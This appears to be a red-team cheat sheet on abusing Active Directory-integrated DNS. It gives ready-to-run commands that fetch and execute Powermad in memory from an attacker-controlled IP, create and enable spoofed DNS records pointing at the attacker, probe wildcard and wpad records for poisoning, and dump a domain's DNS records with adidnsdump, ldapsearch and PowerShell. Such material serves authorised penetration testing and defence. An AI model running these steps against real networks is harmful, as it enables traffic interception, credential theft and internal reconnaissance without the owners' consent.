# ADIDNS Abuse

0\. Load tools:

```
PS > IEX(New-Object Net.WebClient).DownloadString("http://10.10.13.37/powermad.ps1")
```

1\. Check if you are able to modify (add) AD DNS names:

```
PS > Get-ADIDNSZone -Credential $cred -Verbose
DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local
DC=_msdcs.megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=megacorp,DC=local

PS > Get-ADIDNSPermission -Credential $cred -Verbose | ? {$_.Principal -eq 'NT AUTHORITY\Authenticated Users'}
Principal             : NT AUTHORITY\Authenticated Users
IdentityReference     : S-1-5-11
ActiveDirectoryRights : CreateChild
InheritanceType       : None
ObjectType            : 00000000-0000-0000-0000-000000000000
InheritedObjectType   : 00000000-0000-0000-0000-000000000000
ObjectFlags           : None
AccessControlType     : Allow
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
```

This `CreateChild` permission is what we need.

2\. Create, configure the new DNS name that could be likely exploited for spoofing with Attacker's IP and enable it. I chose `pc01` which was found in DNS cache:

```
PS > New-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
PS > $dnsRecord = New-DNSRecordArray -Type A -Data 10.10.13.37
PS > Set-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Value $dnsRecord -Credential $cred -Verbose
PS > Enable-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
```

3\. Check the newly created DNS object and try to resolve it. AD will need some time (\~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol:

```
PS > Get-ADIDNSNodeAttribute -Node pc01 -Attribute dnsRecord -Credential $cred -Verbose
PS > Resolve-DNSName pc01
PS > cmd /c ping -n 1 pc01
```

4\. Clean up:

```
PS > Remove-ADIDNSNode -DomainController dc1 -Node pc01 -Credential $cred -Verbose
```

## ADIDNS Poisoning (Wildcard Injection)

* <https://blog.netspi.com/exploiting-adidns/>
* <https://blog.netspi.com/adidns-revisited/>
* <https://www.gosecure.net/blog/2019/02/20/abusing-unsafe-defaults-in-active-directory/>

Check if we can perform the attack:

```
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r '*' --action query DC01.megacorp.local
$ python dnstool.py -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' -r 'wpad' --action query DC01.megacorp.local
```

## Tools

### adidnsdump

* <https://github.com/dirkjanm/adidnsdump>

```
$ adidnsdump -u 'megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.megacorp.local -r [--dcfilter]
$ mv records.csv ~/ws/enum/adidns.csv
```

Check with ldapsearch:

```
$ ldapsearch -H ldap://10.10.13.37:389 -x -D 'CN=snovvcrash,CN=Users,DC=megacorp,DC=local' -w 'Passw0rd!' -s sub -b 'DC=megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=megacorp,DC=local' '(objectClass=*)' dnsRecord dNSTombstoned name
```

If you need to dump a child domain ADIDNS (say `child.megacorp.local`), then you may want to use `--zone` and `--forest` options:

```
# Will dump records from DC=megacorp.local,CN=MicrosoftDNS,DC=ForestDnsZones,DC=megacorp,DC=local
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local --zone megacorp.local --forest -r

# Will attempt to dump records from DC=child.megacorp.local,CN=MicrosoftDNS,DC=DomainDnsZones,DC=child,DC=megacorp,DC=local (and may fail)
$ adidnsdump -u 'child.megacorp.local\snovvcrash' -p 'Passw0rd!' DC01.child.megacorp.local -r
```

Merge all the IPs into `/24` CIDRs with a Python script:

{% code title="cidr\_merge.py" %}

```python
#!/usr/bin/env python3

"""
Merge standalone IPs into CIDRs.

Example:
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' > ip.lst
$ cidr_merge.py | sort -u -t'.' -k1,1n -k2,2n -k3,3n -k4,4n | grep -e '^192' -e '^172' -e '^10'
"""

import netaddr

iplst = []
with open('ip.lst', 'r') as fd:
	for line in fd:
		ip = line.rstrip('\n')
		try:
			iplst.append(netaddr.IPNetwork(f'{ip}/24'))
		except netaddr.core.AddrFormatError:
			pass

for net in netaddr.cidr_merge(iplst):
	print(str(net))
```

{% endcode %}

Or using [mapcidr](https://github.com/projectdiscovery/mapcidr):

```
$ eget -qs linux/amd64 "projectdiscovery/mapcidr" --to mapcidr
$ cat ~/ws/enum/adidns.csv | awk -F, '{print $3}' | egrep '^[0-9]' | ./mapcidr -aa -silent | ./mapcidr -s -silent

$ cme ldap 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -M get-network -o ALL=true
```

### DnsServer

Dump ADIDNS using PowerShell and `DnsServer` module:

```
PS > Import-Module DnsServer
PS > Get-DnsServerZone -ComputerName DC01 | % {Get-DnsServerResourceRecord -ComputerName DC01 -ZoneName $_.ZoneName -RRType A} | ft -Wrap -AutoSize | tee adidns.txt
```